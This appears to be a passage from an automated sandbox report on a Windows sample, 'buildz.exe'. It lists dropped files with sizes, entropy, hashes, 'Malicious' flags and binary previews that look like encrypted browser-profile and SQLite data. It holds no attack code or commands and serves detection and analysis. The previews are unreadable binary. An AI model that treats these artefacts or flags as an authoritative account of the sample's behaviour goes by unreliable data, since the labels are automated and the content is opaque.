                        Preview:mozLz...&S...p....?.S|.y>...z...z..iGt..d.........}.6..L...?.k...3.}nx18zkh.h.?6)C...*.e....U.....w.;...}.ns..(..T.WY.".G<..@..Y...o=.E...g.S*r....+...z.p.....}....0s...N..RT...0...m-......uo.r..A.#.1dT....d.L....wJ...\.$m.K>./..,...4.<.).)...HXIh:).\.o....m..6._.._..gOb.N......FK..Pqb.NxU........J..$.(.W...v@9....)`..5:..T.7..+.`wKZ.!&....U.....&i(A......Z.Pj......F.[|.o..Sg.B..{....==..]z~@.hJMk-..1...M..Bpf...K'z.vT[...g....!....\..K...Q......N....B......R.....'Y...H..s....l....B..H..*e.o.s.....E...]{..3......}.n`......A6)d...>..2\.........dv......`.]E.t.z9.....+.(.j.l.........S.s...CG.G .:.Q....."......J................~.=.f0K=.^c[O.U,...w.aF..,.Ltr..c`.+..l...Q.fy.G...M......z.-.....O_.x*..!.M..X.5t.k..L#..^ /..!.v..4.........3....u...B.7.l7.~.9NV).|...&s..._:Y.G.~E{...v...L.BqR..>L.C2#."'..\....m......P.gf....jDW.l.I.a.._....[5..4iT.U...C.d..>..=..V.{........Z(0..<b.N ..k..1....&......g..j..%....6N......z.|...z..&{Bt...l....)..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4483
                        Entropy (8bit):7.961517839276869
                        Encrypted:false
                        SSDEEP:96:MUbdOyzLiAU0kRWoJD0KhGa8QCIedqk9/Yd7bxOmmlSUbKA:MUbwyz+AU0k18bl7qw/OxSKA
                        MD5:E83BE1006106CD4C6319ECD78056DA34
                        SHA1:50CDC5BAE292CCC101963BF866255050AB723970
                        SHA-256:D63CF9A960A792D0925B5CAAF55CF5A59E287301E324AFD03A735C5873BF413E
                        SHA-512:FC1DA14B5222AF5064742E8F8672329B71823D07EFC8147E597A6B7C3E6233B07ECA69F5379BFA9F8E966D12CB061BA9B946622B94D4C00322B42FDBDE48E08D
                        Malicious:false
                        Preview:mozLz...r.....\...U.....j<u...C>b...g?d..e.+.sO..S.....u.^....H........c.O.n..Z.G/........4.].t.+....+@x.U.....w.P3.{..M|.Q.fd.!.zE.Xd._...*...t..{..o.a'PV....;...GP...yhTe1.L.L<.P.9U-@../.;....k....L.k... .n...)5...;.B..d.)...Mfw.4............g0...../.}.&...B..X.....;.*-..~U4b.*pE....,;Y..Y.0c..7..U...z(.3F_.~...........;...6..|K&.P.......E..#....."oU......j......5......\.Ea........7...t.....L.i...<u.0...v.!...../...z)!..].Q.*.....U....|.3{.....x.....@.^.#..6...gr....LQ.HS.....l.(."c...../....U..~.?e.*D)t.'..!@'....d|cB..F...c....2....4.).5..7.X........=.=\yy...#m....Z...y.>.D.7..!6...`!.............E.J`XB.!u.AQ..u.|#...E..G+:......J...OK..)....].;]$ZI..^}<"....(.[...z.L.f..lu..h?..gT.tmk..-F.&....y...M..|R...e.=O....S..t0.y...H..N......`...A...8.C.1%.]s....$\^z....& %R..X......w..Y..$.H.D2...i1...."6U.....X:...7...O....Iw.;x.:.=........{......K...<$...D.Jo....RvM......>v.ght...u...G...F.z`.s... jg.;..r.....WQ.=.H.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18715
                        Entropy (8bit):7.991077173831379
                        Encrypted:true
                        SSDEEP:384:sbRgpvky0nCuhHZu5b70GJd26/V+F/+13Zthr5YM4lYR7Q9p65jA:sbC9ky7CHGEGL2E+W/PfEyA
                        MD5:142233CA6C99C619BFC50E7934AF81DB
                        SHA1:2F043DAA30AE64AB30D1D7E56EB1DD9C6EAD058D
                        SHA-256:1486F975120A8754665DD47275D1D223D75C2F72A07D4FF72A0506DD2C25FF64
                        SHA-512:B97F521D1C9C3EC5B4E1936315B968F771ADBFEA8CE7585131F4F62E51EECA53E6DE6EC3B56C9ECA641493840A125E530D6D4C0DEAC57C6DF064F3036B90762A
                        Malicious:true
                        Preview:mozLz.Y`..r...Z&.*...#:.../.c...:..5I-......Q..?.:F.3..."..r...ZE..L.uL*1...1.Aw..JKS`f..kQN.4N.%..(G...}...LO.Lx+6...{.i.d...r....te...q.x......\.T.?..m.\&....N.j..A~.U....i,RL6^...{_.......7..@++#..W..Q|.u>...F..y.......1...2`.f..A....]Zj.2..q/B........eZ.\.].)(...'...yS...FJB..5.&.1.v..0qP....\...4...s...?s5~.8...4..%~^e.r?lSCI....u.HP......4.{X...T..U'....L.z. .(..N.tSi.j..w..UPt..M1J.'........By......5.M&..Bt..O..P...e...RYh...A<9P...`........r.rd..Z..")...aQ.........@...xo............WI....\..o.#.>...t.@]Yi.zK..*aMd....1K...A..z;.A^|.......9CP.. ...j.nk.#mj...<.l.p..<c}...Y..JO...uK~,..m..|%.....-$!..S.....7..r..?.1.}UwFv...K....z.... IJ.j2.....J.\....?.c..$..;.R...-Fo.......{O#....V>..M7r....$5.a.@....b.c..xB!.....G.kk:J/.....v{q.....Y.'.*H.....P....VP..,.......bD.#.E?...l..@..>.sju.fE.5n...|..YN..d...3.d.6.}.....&9cF.M..+*S.Dt.h%.....D.0....t.{D...[.....1..8<.7..On..G....H.......=jm.=00.z..u:5R".#....s=sq.).Nt...a....t.o..#.F...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):18727
                        Entropy (8bit):7.990371331289445
                        Encrypted:true
                        SSDEEP:384:DTIQKJsQF44gMtS7F9+4RnrKtbWR0pEHDZBBHWxcwtxRxsWCA:dwF44TM7Fs4xrSOlsRwA
                        MD5:5EA278AE009E75124BC74BBF48DDDD56
                        SHA1:A13A23D1D81B406C984F75F6B42AE396831198BE
                        SHA-256:FD1353D2E660F5DE8A498225F0809C89ACB7B9F97E0D272458B1A48319256333
                        SHA-512:AF2B56CB4339B50A03AD238DA7F969EF269333A6206F38EEDB547CFCDD35A971AF39B23510545D0BADAE9EB48F0C5EB7DF5ACA3228B7ADB908877330233C7930
                        Malicious:true
                        Preview:mozLz...f[...k.'.$H.u..u..@4f.g.;.G.8..M..0%...*7w|.hk/...#t...J....;.?."..;{W{..4.w..L@..N..............?k..z(\tB.)...v]..Z..]4.*..#...I......./..1.O.dN7....t..C..#.....[.g...Q.T.3..,L{E...-./|.x...........\.p...K}.l.v.~....V.R"i>W...T]C.d^O......qg..{..........;..."|..M].`.h.....z..w...X.1..;...tD..d........N.....f..Y.....Y...f.u.......;HyWc....T/..[...+.j..i. ].].<2......#..#...O.|.`.......,......nh..fdI.??IZ:..8....B]........X..'......?x..._.".......).....J....}....9...<..g..?..V....r..@.....i.H..t..h.#..j..q..r...RoMsk.hSk,!.M..5".....R......:..n.q..F..H....a..Sjm..!.3ZfY.~O...l.....Zc.'.A......\R..2....'.Z.%.>..;..^....L.....a..d.x.....G.b........$}..v.r..z...~..hC...b.\l[...'....... s.-8#.g..../.t..+..2,.v.t.../2c.--....d>.K.L*r... ..)..S...$~^.B.)z.7..h.....e...E.K..U..?1t......Bh...\...a0..)Au.bGa.x^.<h.Z\?.-..p..Z...Y%.Yw.-...Z.Z..l.......a..%...?..9...|yL..oM...D..3..mO....^.....I.>....o.l.f......"..DJr1!....D./m...$?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):779
                        Entropy (8bit):7.70844108245912
                        Encrypted:false
                        SSDEEP:12:S+IVQiW1wZ/A3ruJJ0LHzM9MMxpTWM8AvbGxlGUzgMg6M/26Gcii9a:NeN9/cuK4lpaM8AaxlGBMglGbD
                        MD5:9FA4C1BDE8BFDF4FF47E5EFBC31BEA8A
                        SHA1:9E707022E7A36EBF919317F416494F2D763F7A58
                        SHA-256:EE74D2CAC8560FD85E50B01063DDB7A2DB2B6D0B7797E870DF0BEF6D7A1E2D8A
                        SHA-512:5D8E5DC11CF7B6B66341336C0635E6F433C378C87DF49E31C5D14A0DA55F07B5A1B64BAA492CB5D943F3D09B8BE8EE500E932F6C3650E40612A9EDB129776715
                        Malicious:false
                        Preview:mozLzW(5...AB0.T9..u;.!..zC.m.._..S.".'.oF.p.........=T.p..T......w....m.--....5~.B..T..B+...._:..2...\.bw....2..3.....mGf.e.ID&.6...,<...Q.>W.M......`...\x..c.m.j...."...Em?.<y.;J.>&D...U..v.........D.N..}....:...A.s,X..t.rn..+8..B3\......KJZ.!..}...;.....R.2..../.x.o3...h.....i.=v..l..`.-m.1.^......b....wj..a..........y.P.].C4f:.../.f*..9.n.#l.}..G..h.OI.....^_.5.!.K.,1.M.MpK.~w...]H...#....P.;.^.....NU.xe...:...m.*&.}`.....:e......N....Oh...F.*b...N@^.;..A..5...7j;..6.;......u.......H.$......7O../.`.5..._}.`.N.F......vz.Z..ok.{Hw2.?HK.. .J.zI&.6.G.09..vT@.......B.].J...W.'\.|.7| ..x. ..[..Q!;.0.....{..?..R..`.. k.b.J*.Y...<........n...!...zG.rTRa..g..8...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4477
                        Entropy (8bit):7.963024075157821
                        Encrypted:false
                        SSDEEP:96:9YlL75lL3D8u4CskgJ/LMm+9bCNPtn/aAhbzwXM8hFzaKcA:9YlL75tIu4CskgJom+9bIt/aGbz8hjcA
                        MD5:CD223CCFA969441F934824913E44E99F
                        SHA1:7636FAC6B09631F7F123F51B9304C11199E636E3
                        SHA-256:4782814D9673150A0B56FE8ECC4D6BD09E981627E3ECBF22129E60EA7AC2C684
                        SHA-512:D5CDD2E5145B9935F32336E82A963105BB038F5D9EE522B8248625C5C532EB373597E75104668851D2F0D81BA55DAB1066287C2020BA303C971926A2F20EDCE4
                        Malicious:false
                        Preview:mozLz.._.!6.=Uz.).>..QlQo.r.>....m_.7.=.t.E.I.Pq..N...sv....4...'w......k..Q..g.9c.]..Of.....p..0f.n..]Q.............f.+..t.....x_....N......o..2. .Z.i...@......ww.K@..?a]......i%..'...HC.I..z....DW........tH.t.yu.`Y....f..Sk........4y"L..<.l...!.9.U.f....#G...Vj..g..Z..g.^.V..[c.....<.Sh.5.{h.H"+...L.OL..eAT...q/.5.".iZ ]$U..%......2.(.a1.io...,..@.;....`.B[t.....u.yY.G^D.{.S....h..,..3.....o......)...[YH..Q-..A......y......0.L%..-._.........<.L..+..p.>:}...E...U|.X.}Py..}.8....1..{.{.........W.O......./.v-.....g.h).g...Z.h..;R?.....q........X$..].a.4....N.d..!.f..2c.K...#.7..M.d.[..c.q{...5..x..s...&o..r..{..9.&..I.,8...v....i%......&.p...C.2c..\hqq."...`=...{....m.Y..$.v.p0EC6(......9.|.S..OV..ln.......mZ.?_@.F..(BS...h,.h...r..........A.-)....p...*..Z.....SE{.....R.....;....&..d..t...[G..6..{._..lb5`'|m.:.}6.....c...3.r.....h.0y...0...\.........b.#...5.X)$...........v?...D...r..dq.=....&F.I.*?..&..x....vD..Nw.@..RT...'a..z..G.......v
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):778
                        Entropy (8bit):7.715215833788439
                        Encrypted:false
                        SSDEEP:12:2fZ5icMQmqAwoWk+aGFUIlsZxsa9cL1PT8uefAMfWvIaq31ZtyNxk6gLK/26GciD:2zbGpnIqxP9cL1PAfAWWvIPPFYGbD
                        MD5:1948687C47130CA6FA389706E9C0750E
                        SHA1:335E18FC102209D61D8441FF1FACF3DA4A667EE2
                        SHA-256:0E04B767980E5B52495BFB19DDE177C6A8D8F3790BD02420386137BA1017394E
                        SHA-512:0997D2BE61BD969FBB0A86D5313FC671AC8F90FE6E372AE992710AA97BBD615318C723FFDC2DDB2556136E45396B2B30E67D87150872FE93E1EDBE6FE57280ED
                        Malicious:false
                        Preview:mozLz.*V...a.|.+......K......Y./.,..v.]u?.&N7....b.C......7..ue.....P.b.Ua(...e....tk..O0:.&q....>...i..I.[y..SR'2w.Q.H.......N..k.7.....$...^;..x....t..9..$.V)Z{.]......xDn..=.......9.P{......c.^..m.........+.SB..*_^`.\&.h.^ue>.,..jx..qHQ8K.....t..n.x"......f..`D...&.}.L..W....B..C..4...0....@2D.......P....."_.X....>..:.RZE.1...i...(fyZ...F..x.4.EP?.ye..M...:.^..W7.@s.-....`.K.......NbL.P.i.B...F.......(..7..?...I...Sz..Z.Om.....B.....'pW..[f..sX....#QR. ......+1.F.O..T...'x.%.ta..sLg...b....W..9..U..<.1...J...8..X.@M..6\.0...xiNDM..lns..c...S.Y.....s.K...x..5..(...'...k.<..I.Og.....o.......f.`}.<..m.....c.%{...D.z[#..f....y.Pv.....a..|..4.J..M.'.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15331
                        Entropy (8bit):7.9873050614826155
                        Encrypted:false
                        SSDEEP:384:dTkXhz3pbvtBDI9bf4yiUW23RmJA5qODr+nwoZjEg0ZZiGzUx13A:d4xzzN+f4yiNR25Zr+wCj/sZI13A
                        MD5:73A9394402867057B55A565766FD9B46
                        SHA1:B33F9CBD9C77DCEBBBD1CE241422AD37A44BDF25
                        SHA-256:046FBFBF6BF993C13AE260754C2416179170F409FE8BCA5D139819E3CED5C7AA
                        SHA-512:51FC469962427E8C26EC98FFE79C3CF3F380B1503E54B77642CB77A2CCB94190E785FDDADF5746C08A8D1395682DE48CB5EB76F349C26561018B628EA00C0D7D
                        Malicious:false
                        Preview:mozLz.....z".{.-.d..r[w.......}uFL..|.\.\..Qh^* ".@.y,e,.F........"M@z.2>.."...&;.rQ...eD...M.r....3.4.s...q..S..gb....{P....(.$}..P..4.7cQ..Cf.$:Mq.X....Y.+_9...h..7....%U..*....R......j....!..8#g......I............4....7.V..!..71g.+."N.z.Q.l$.%....%......i.".......-k...$.....:1.;.I.J.S{.S......zw.......v...@...R........ ...c.[....#u-7.O}...CE.(`Y......#LDA.:)...u....5._3.7...{FF.....K..J..+"..`./..l....HL.K.^&...k.i.Tm..9Wce.<..V_81+&..mT".2.Hz2.....9..=..9a...M........!S`....q...T...V\c.p.Cs..#..4..m.].....4..!F...V.}H.t..+.N`....x.....A..%r;.y.DH.A.r.8..I.....O.|.9[.....wS....L..N.u..O;.R.<....4.M...D.AJ...dz.h...... >4C+...q.g.(z4...iz5V}..[.N. Sj.VR^......\..0......DzP........v...C...i.(...%....j....Q<..+2.~$..._....V.EH.3<..............|w....T]..N...b...... .Q_..N..1.M._b2B.U.U...E.oo.. D.Xk..w...N...C.UV.......(....U,.....x...h.(s..D.R..#..6..n]>R.Ri..9(...)!...n..{3.h..F....~.....a..SM....A8[.fMG/..$.....F....b.&m..K...)..b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):13637
                        Entropy (8bit):7.986035230886703
                        Encrypted:false
                        SSDEEP:384:k/brvuwFDrnyzDtiYsrXjScvu5wv1oXhP/A:QvuwIzZWrTHGB5A
                        MD5:AEDE902E238134FEA65F9E8D457E92ED
                        SHA1:AF25A6463E2EA461B0FF970FBD764C1EE7BAE90E
                        SHA-256:E57E7F1E1834A3188F1EA267ABFEEC2012020B4BF45477395D61D33EE1AE315D
                        SHA-512:66061F80BCCD553D14341FB052FE9344F3F10E5F9F24452EEF5D3F850E3904366C44D6CCC4ACA00E474F06F74350FD8A9248C848C9487D1F11538683516D3EC0
                        Malicious:false
                        Preview:..........4u#.t.R].K..n...9..|....l4.*..b......!f....}#....x#......W^SA.%R.p3o.Rx.I...i...#.U.V.,h..?.t.!o..{:kk#T.9....a)h..I.l!e..3.0../,T-.....(.=#aNk[Y.q4}.T.....0wom{u'../..r..}.W....n..^.)....b...E....'..t...+..'E....Z..^.|.{......1Y.}...lYP./....v.|U.8 .....-....Xg.U.lTr..n.10b,`.?$.......{...L..i......5.. y.g..R..6..a......u{.....d..c|>=xv...vuN0X6.a...I. D.rH.}..3.}.q./.D.....6.....4.U.Ug9....:..f..4.V..Pb<..~.xq......&.j O.F.le.....b..n...j.av]P..d.......d}.&%.WdC./."..4....=e...(P.D.3...=...........).h...U.<....S..U.....'..Nb.L.._...i{......Yq.A.VW?G.52m......{T.i.....-b....Y1.....$Y..#.W.e.]_.6..iQ.<f...@....R..o.C.. U..nV.l..g,...,...-X./.Vu.c,.d.~]........N.|..&]#.__r.[....k>Zf.}..<.2SOi...F.q.~.... 1F....S*H.p..E...i.B..!7.e....YI=O!9.k>......W..nWl.*..W..2.....&.S&9~...`O.O*7..ca....f.T...@..P.r..=.w..r".s.H....1r.mTZ....*#.......@.. ../....j.D.O*C3.e..7.S.g.Hi$.(.h6.GQ=t..}...y.WG9...6..<L..n.O.#s.d.P..&|..H=n9.MI..!.~Z(.=.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):495
                        Entropy (8bit):7.522373018481337
                        Encrypted:false
                        SSDEEP:12:YWB0v3su2fp/RHwwDcxHcBUzl8yXspuSv4gMw5BOi+uI826Gcii9a:YK0v8u+DqUUyy8AZJWBOLuIOGbD
                        MD5:5B1A644CC35A3E7188A76966B755101C
                        SHA1:2FEAE4F51F5CB49AFBB7A3E5505EF2CF4F731743
                        SHA-256:A07AA4480B8EF0D59EE1861937E4724C44FEC30028E57FCA7A0180449B7792A7
                        SHA-512:FDB74661578F076F9A3C0B66F7C22D2CA15DFF11F13F739395C1A853B7887F8D5A5CBEDD3949F2AC86015B2E1F0F5306440B52FFD6ED0CD7258D7299E129F67A
                        Malicious:false
                        Preview:{"ses.!VA6.Z.........-.HM..i '=.o.I}.}a.\!.].../.l....(....R]..;T=a...(....y.x.[..'z......{f...~R..^....n.I-....._|p(.>$&W....|.=.{..qj4a...u...~y;...h.../.&..OsF.....{NGuL..5.>.....L8..8]0...;....`P#...1.X....\..Ym...fJ/.S..{V.`F".uu.vp.\.t.7.O....,..3..q........;..E.J.HvH.=r?.|...r....]y..o.8...Y.N...b..`.E.......K..|....V.(Q.......E..F..c.CeB.../.....f.L.kk.M....v.:.Z..,.....I..|.......sEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):385
                        Entropy (8bit):7.331626220121941
                        Encrypted:false
                        SSDEEP:6:YGF5Z0ySlHqkWw1YllhiFeCDZUtYR6U3VoUIB8BGu8aKSPn+EQ8DMr8FGcii96Z:YGl0yWD+hiVUm3VoHmGZTs26Gcii9a
                        MD5:A09F8B4D709DD8E4FA42036887EAA9E1
                        SHA1:1D05B0923041ED78D3CB98D0F1FBD26212B375E3
                        SHA-256:1B16D7A983DAF9AE036F48DB161F5CE8460189AD6D47ED75EAA112A134126259
                        SHA-512:895E0037BC82B6B9BC3B6CFE7128249F2BE993ADE8CF07F917D343C2A1696CEDC35C4971FF867781D157CD753656B6DAA4236A435251EA4635A3D710E860A40E
                        Malicious:false
                        Preview:{"cli...:.b`j.h7;.b.o..f.......R8..kS.V..M@..S..ZY.g...W.V.....H.K.E..>.6..q6.=.......eTz.Lz.^..TD.#*....:.).....Z..YA.Gb.q.b.2.d...C}."d.h/..Q.N..h.....bI..!..Y...a.L.h5...bqQ.7n.S..k..,.'M.i.?N.KSu.\\..'n.K..a.HU.....!.....I.i.H.^AA.,.w.....<.RZ..5.....3......g.2.....+....\.z...%EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4670
                        Entropy (8bit):7.955744899420119
                        Encrypted:false
                        SSDEEP:96:iHyQfSnvmMCOS4x1mG4njMsAejVLhI22JzwUZTZ3FhkWh+l718e8t47J2xXj82ML:iSQfaPCBY4QZ/28zwUlhxhfeAc2xIGA
                        MD5:B85150053DE56AC309B3E577158AA12A
                        SHA1:A8202A5C92E619DD94EDA19844F208DEF75B787C
                        SHA-256:064915660977EFDF94CCEDEEFCA33E411EE909F35BFC159CA08EC971FF30EDCA
                        SHA-512:FF3F2F50CA4ED11FB8BA752E86A76C6D1874A16A9A274EEAC3EF0C8B1B39053AD5F5D3E4454BDBD7F6156E2BB5C7E467A1D9EF7AEF9171C8E95201BFAA64FDAF
                        Malicious:false
                        Preview:mozLzi8...e.Vi?p..'f..u]....E...:..LYGhU.........{.......o..^.?E..:_....._...>yD.E2u.qG.......=j...........Q....*...........oG...H.l'.?.d..?.r.z2.K.f...'.k...s..E......ha.*...z.v..v.....[[.k..-t..g)./.+.F..b.:.}.:.;e..h.V.m./k....^..ZN..(.......h......N<v..w.NA.....=........^.8.Ov....Ok......;.w.,..id.X.R...-..y..OT..h41.e^..E,=.r.."POcZJ..8..[)A.......?..9.x.L'.t.(...K.\../..j.}..}..yo4I.......0...3*T`0.SU.....{v.........F&O...'^...G.....?..AFZ...-3.h=..x...Y.U...!2.[.DGl+..+.V..^[+..+i.+..>..$..<.....*..T7.~%.DT...... .K.>.v3@A.[....L.7.R1UN.]...Km.}..iX.........,.06Y.{..,..1..>.....h.......C.m...Y..-...u.."$.O..|,......Y.Y...W4;.[..!sNK1.>./.X..=.W.......H.1.%.5c..(hW....*.......U...vu.fJ.`.@.....1.......x/._.|.s.^.....;j.3...l.!..n..X....=..lMx$P...%.+VPD-.'m.._.....Vy.W....r..~....l$.7h..E..t.....k..yWT...E.:WG.[8..%..........4.....{...3..H..^.X6..{.Y./..~Y.n...c}2YK........3.?.!.f.r.UYt.....DqQ.P....[..g.*..t..^ZS.^$...*...T.....}..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):4670
                        Entropy (8bit):7.963883511835456
                        Encrypted:false
                        SSDEEP:96:SS/oUZ/n8C+UerBhjO0n+fFwkumfpUOE1AqX0KWa7UYDBMQCvGRYxfF5HA:9/oUZP8C+UES0nQFwqfpUZ1AW7TmQCvi
                        MD5:F455543D4ED11AE5D9D6FB59A3E1B3B5
                        SHA1:1553983C311C5EED3864C021165733850C409AB3
                        SHA-256:38AAD6CF8DB2C5C395B304E9CE47D5C10FFD2E51C5EB30C9CB6173145B6A5097
                        SHA-512:EDC389E764159B9A5616024747C4AAD2F12643F905A145B985D23B3FC5FA57DEAA7ED73F61A9E05E156D2325739E367BE36C5579358021CE67A1B5E68CCCD57E
                        Malicious:false
                        Preview:mozLz....;.e.F..I...Gr.+../y~E5...I..{hv.V.t.=...P.....(:.T.$X..j4.J./.R.........)..8.....?.G....h...U..u.....=......g.....41N..Nm+..l...o.i..x.w.Y........d^.'......A.N...ri9......_9.(r;.r.)..W"..?.....r*.l.....P.....Q|o..VnJ.`..q.ghq..3u\7B..Oy..O....k.....ux.....<..B}.A..........`X7.^..c,.!.....`..qAW|.b.Y....vo.q.t...bAp.B.K..b..h.g..n{.8$3N1.t....c<.~.VYk...[i.t(.l3.^..36}UZ.g.<+ldT...L.......,Nq...O]z....(.B(.Gk.".....8.....r`..}.....Q..R.........A..r..=pZ..{(i.r .,.?.v.I...V..'..z..u.i.9.....9.u..k2.4.F.|)...W2.y.)..m.dW~GxN....E......'..=....v..O...|.b^....Z.4t/ ...w.0..O...].F.tca..9.{,..gT.*K".r..+.KFy....?....'.....y^..`.^....../.G...H.R..1.Y^5..7W..s.T.](./....J.......h]....R....{.....*...m..3.J..... .K.a..f@..P.n..,...z..k..2.5.......r..-.@...`.......G...f...QB.e...Z..Q.=..........(...>....QL .^2..w*.-..v......6..1.@._.1>...UO...0@o.C...0.{..H.n......C..X.><.b...k*.^..z?. ..!.=.,..'.,@..sf.-..|.;.g...je@f....-..i.c.I..X.&.j.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):131406
                        Entropy (8bit):7.998589136852036
                        Encrypted:true
                        SSDEEP:3072:l6BwjcIHDpQt2Y6DmPz6ndf//6D5Ctpm4/dhRA:ABwjcIjpLuz6dfn6D5UpmMG
                        MD5:EBEBD0939D9850DC0A1A508D4FA655F8
                        SHA1:65B5027259D67952AFF13CFDF13C44925F255992
                        SHA-256:299531498F28EC10C097A696AF35A4E46E0998A3994115464F1FCD7B45E316A4
                        SHA-512:C037169EC73389E2619ECB0744231E278754812CFFEB0A11D4DEF3F0949098AEFFBAF59ECD4F6064DD96FB0444165197462A7E4866C56C3B58FB34F4CA188563
                        Malicious:true
                        Preview:SQLit7.R..K.........}..-6.wc..a<..<......W2...w.....A...y.".[.7....P..4M...|@.~[.Yn....o..2kD.`.)S^i^....J.GRc.6A=s.><...i!N......y..j..$.D.v&.~....Sj.,&.!.W..A.KA.Hz....*...?.......c..b_\......$...w..9..@.,2...`..R.N..4.qe_.a..gp.......^Q.&...B02ok..W$....0/.\.y.Hs......8....g\......V......*f.....o...`.......-.s......Y..x....r...2..s3....l_.Tg.[*...y.5..7...U.I&..T..+?..a8gP.._v.....R..OS.....+Sy.L.....h-:.E4...a.r...l....+4`Xs.-......Kz.?.d:...fp*J.<...,/~h.$,K.s. ...Fw...K.A.D.....PH.W..%..O..Y....z.;.{..."..."y^~..U].".....`^..Ed..D^........._*;D.g\...L..:.....7..4r......SH.......r.........?5!....h..f&..A.H3......h.`...wa....}f.u.~^.J...-.C?t..1e.5|..T....Y....t.....r.."...lc~........u.D.:G.`.d....C.Ha.[IS.,G.......o.@n.{.....'g.<..*.:.m....jB....h^..lhy..F..p'bB.x..>..p..'..j2v...e.f.9.L.$...)v...3.4..e,[T..."V.../.K?(S..2..d.*....1..........x..pw.n.ZD.O.M$.:....MmC...X. ..;.p...i.|..A.>....$....RB.........eI.".?......Ch.q.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:TTComp archive data, binary, 4K dictionary
                        Category:dropped
                        Size (bytes):370
                        Entropy (8bit):7.2700371191093645
                        Encrypted:false
                        SSDEEP:6:lJzJBD3014Nr2Arb3xtRN9Vo+ky4r/n4A26P+1Ir+yqVHCFMr8FGcii96Z:/JBD3FNqAPxtRxLkdrAmP+1Ibq426Gcq
                        MD5:756ABF71EF06FBBA782D67D48DE86FA8
                        SHA1:922CA4EB1B47C0EE50C51BF4E4FE69A6DD3305DE
                        SHA-256:CCA695AA3B43D58BBD642930349675340604B11EF615EA82EE15D1E3AABE6004
                        SHA-512:3BFBEB9944C8CE488BBCB2072C0B920C0C087086A8E94CA3E7AF71CEA9B6A25D5498396D7AB4A88D00B850C4F4DEC8A0D91F4AB64DC605DFA3A0E4C119337FC8
                        Malicious:false
                        Preview:....&T.+..Np<*E..pR..pl3.p.K...8asD...ITk?.~..1.[.i.$q...@......B.39..E.'.+..j.Z.......PW..J...9...X_E....N.F...0..}.6.4R]s`.Dp}[.(?. .*."w.........._q.5..C..t1......C:...@..p..$....Kw......=.#fc.,w.u..r..C...\.A..B. .s.L.O.9..F..p+i....R4^...A..D@.A...''.q.....nrbz......!.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49486
                        Entropy (8bit):7.995788477940168
                        Encrypted:true
                        SSDEEP:768:BSoDvKvwOYj6rhHbtOfXSnkzfdYsPoPg7KspSRS5EUa1IleFYKw9OWvqOecd7ySc:gybqh7tOfX+EVYsCLFYz/3TeIA
                        MD5:BF13B446791F2A78ABED076C92CACC22
                        SHA1:F9313EDE829888A5BA95A01C569E377076FA950A
                        SHA-256:5B33037377CAD57D75E5CE1F14041C105859ED277D3AAA99CFB5791F366685C1
                        SHA-512:CE89CD12FBC69F711229015EA14D550D281CBA2580909E5A8F37348D5F53BE04D667EFEAF9150B6C5972273A09CFAA6225D712F74EBF50B71363B120D3CB56DA
                        Malicious:true
                        Preview:SQLit...8x....u.'F....\f........6Y.dGm.......:.V.......a.?V.T../.......]..J...Ahf..O.......1.......0i.9.4...b....Z...6.FEyt...#m=f..).......]....'y...m.*,D.?h.....f..L.=...8..#..q?u..#[.h..[S...P.a[......&..a..t5K...[....:.Wc|v..1b`.A1.V...y^...c.hB.......K.ETr.!gx.%.._.s......(.<....a.(..#.....Lt;g.L..5.b4........#.B.6....[..._..a..V?4..o...E......w-T.......d......>4.......$.r.].Q./.Y{.|0&)..au...?.*!4......l.,.h.(!.qx`..........9.).TX]\.....O..C....h...1G.t......O...j.d...C.M..i..T.}a.$b....C.!.,-..R....DJ. JD....r.h...n....@.l.b5.*rI.y.. %.=.LfU..)..E.xT..")...b ..B.....0....[.Q.*....0J..>1@?..$.3<..`;Y........|?c...(....B..._.....0R....I.T..rj=.Q.|n,).#.L.WA<..d...6(.....Yw.4..^g..p...)Vy.Wf...3.P.....90)y... &.......?.\................/...rah..\....9G...$@9;.$.....qOg...C.a.B2.+..21f6..G.}z.NE.....f~..9.V..V>w..._lD. ..~.].m.I^.....1.JZ27..9Z...1.U.Ilf....../V.....s&..=..J..A0R.b|...P....l..O.n..U....R,....u..u-^..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):33102
                        Entropy (8bit):7.994583603686356
                        Encrypted:true
                        SSDEEP:768:JLZAl/y7b8DxZoT3MMquDXFLywLqFH3lEs0KNHnNy9lXKaNONnip356ihkcA:JClKP8S3jxewLqx3m32yftNOJid56ihU
                        MD5:3271D097A31F7584C56EE499F838B4F8
                        SHA1:6B263D0AAB9F9BB810006622C737DAAC166491EF
